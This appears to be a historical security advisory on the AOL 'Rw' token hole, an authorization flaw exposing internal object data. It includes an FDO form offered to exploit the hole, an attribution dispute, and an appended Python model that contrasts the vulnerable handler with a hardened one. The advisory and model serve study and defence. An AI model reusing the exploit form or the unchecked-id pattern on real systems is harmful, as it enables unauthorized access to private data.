Vulnerability: AOL (America Online) token hole

Affected: AOL

Description:
Kevin Mack found that by sending the "Rw" token to the AOL host while signed on, with an object's internal id as the argument, any user could get detailed information about any object on the system. The host answered based only on the client-supplied internal id, without checking whether the requester was entitled to see that object. The information returned includes the user who created the object and a great deal more, such as its current viewrule and AOL URL. Normally only internal users are allowed this access, for security reasons. Using this exploit, anyone can see headings in AOL's Network Operations Center, look at user-count information, and see AOL's monthly profits before they are released. AOL put all of their stuff online...

The hole still exists, but is windowed for only about an hour a day. No clue why, and it seems random (despite the fact that it was fixed)... For example, on July 7th it existed between 6:30 and 7:30 PM EST.

Here is a sample FDO88/91 form that creates a button to send the Rw token with its argument and help you exploit the hole. Fill in the internal id with any number you wish to look up:

    man_start_object <trigger, "">
        mat_relative_tag <22>
        act_replace_select_action <
            uni_start_stream
                sm_send_token_arg <"Rw", INTERNAL ID HERE>
            uni_end_stream
        >
        mat_precise_x <0>
        mat_precise_y <226>
        mat_font_sis <small_fonts, 7, normal>
        mat_art_id <1-0-21184>
        mat_bool_default <yes>
    man_end_object

Programmable AOL buttons are written in FDO (Form Display Operation). You can compile these forms using AOL's Visual Publisher Designer tool.

The Rw token exploit was discovered in early 1998 by Slushie and Uaert, not by this Mackk person. The Rw token was used when AOL accounts with Rainman publishing rights had access to two or more Rainman Groups. Since objects could have the same external ID and be in different Rainman Groups, AOL designed the Rw token to allow you to choose the particular Rainman Group you wanted the EOI feedback displayed from. After AOL patched the Rw in early 1998, Rainman users were no longer able to get a list of all the objects using the same external ID. Instead they had to type in the Rainman Group AND the external ID in order to view the EOI feedback, i.e. "1928.tos blah".

Solution:
AOL officially fixed the hole, but I'm not sure what's with that 1-hour exploit period. Of course, this is AOL we are talking about, and they are not known for running the most efficient and secure service.
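The flaw described in the Description and the post-patch behaviour described in the comment above ("<Rainman group> <external id>") can be modelled side by side. The following is an added illustration, not AOL host code and not anything from the original page: the host, the object table, the Rw handlers, the session fields (internal flag, Rainman group membership) and the dispatch function are all hypothetical, and the object records, ids and group names are constructed sample data.

```python
"""Model of the authorization flaw behind the Rw token hole (added
illustration, not AOL host code). Names, ids and records are made up."""
from dataclasses import dataclass
from typing import Callable, Dict, FrozenSet


@dataclass(frozen=True)
class ObjectInfo:
    """The kind of record the Rw token handed back for an object."""
    internal_id: int
    external_id: str
    rainman_group: str
    creator: str
    viewrule: str
    url: str


@dataclass(frozen=True)
class Session:
    """A signed-on user as the (hypothetical) host sees it."""
    screen_name: str
    internal: bool = False                        # internal (staff) account
    rainman_groups: FrozenSet[str] = frozenset()  # publishing groups held


# Constructed sample object table. Two objects share the external id "blah"
# in different Rainman groups, the ambiguity Rw was built to resolve.
OBJECTS: Dict[int, ObjectInfo] = {
    21184: ObjectInfo(21184, "blah", "1928.tos", "pub_one", "everyone", "aol://4344:21184"),
    21185: ObjectInfo(21185, "blah", "2001.kids", "pub_two", "everyone", "aol://4344:21185"),
    31337: ObjectInfo(31337, "usercount", "noc", "netops", "internal", "aol://4344:31337"),
}


class Denied(Exception):
    """The caller may not see the requested object."""


def rw_vulnerable(session: Session, arg: str) -> ObjectInfo:
    """Rw as the advisory describes it: arg is an internal id and the only
    check is that the id exists, so any signed-on user gets any record."""
    return OBJECTS[int(arg)]


def rw_hardened(session: Session, arg: str) -> ObjectInfo:
    """The post-patch shape: arg is '<rainman group> <external id>' and the
    caller must hold that group (internal accounts hold every group).
    Membership is checked before any lookup, so a non-member learns nothing,
    not even whether the object exists."""
    parts = arg.split(" ", 1)
    if len(parts) != 2:
        raise Denied("expected '<group> <external id>'")
    group, external_id = parts
    if not (session.internal or group in session.rainman_groups):
        raise Denied("caller does not hold that Rainman group")
    for obj in OBJECTS.values():
        if obj.rainman_group == group and obj.external_id == external_id:
            return obj
    raise Denied("no such object in that group")


Handler = Callable[[Session, str], ObjectInfo]
TOKENS_VULNERABLE: Dict[str, Handler] = {"Rw": rw_vulnerable}
TOKENS_HARDENED: Dict[str, Handler] = {"Rw": rw_hardened}


def send_token_arg(table: Dict[str, Handler], session: Session,
                   token: str, arg: str) -> ObjectInfo:
    """Host-side dispatch for what the client's sm_send_token_arg <token, arg> sends."""
    handler = table.get(token)
    if handler is None:
        raise Denied(f"unknown token {token!r}")
    return handler(session, arg)


def can_read(table: Dict[str, Handler], session: Session, arg: str) -> bool:
    """True if an Rw lookup returns a record instead of failing."""
    try:
        send_token_arg(table, session, "Rw", arg)
        return True
    except (Denied, KeyError, ValueError):
        return False


if __name__ == "__main__":
    anyone = Session("anyuser")
    publisher = Session("pub_one", rainman_groups=frozenset({"1928.tos"}))
    staff = Session("netops", internal=True)
    print("vulnerable, any user, id 31337:", send_token_arg(TOKENS_VULNERABLE, anyone, "Rw", "31337"))
    print("hardened, any user, 'noc usercount':", can_read(TOKENS_HARDENED, anyone, "noc usercount"))
    print("hardened, publisher, '1928.tos blah':", send_token_arg(TOKENS_HARDENED, publisher, "Rw", "1928.tos blah"))
    print("hardened, staff, '2001.kids blah':", send_token_arg(TOKENS_HARDENED, staff, "Rw", "2001.kids blah"))
```

The design point is the order of checks in rw_hardened: group membership is decided from the session before the object table is consulted, so an outsider cannot use the response to enumerate internal ids or confirm that an object exists, which is exactly what the original handler allowed.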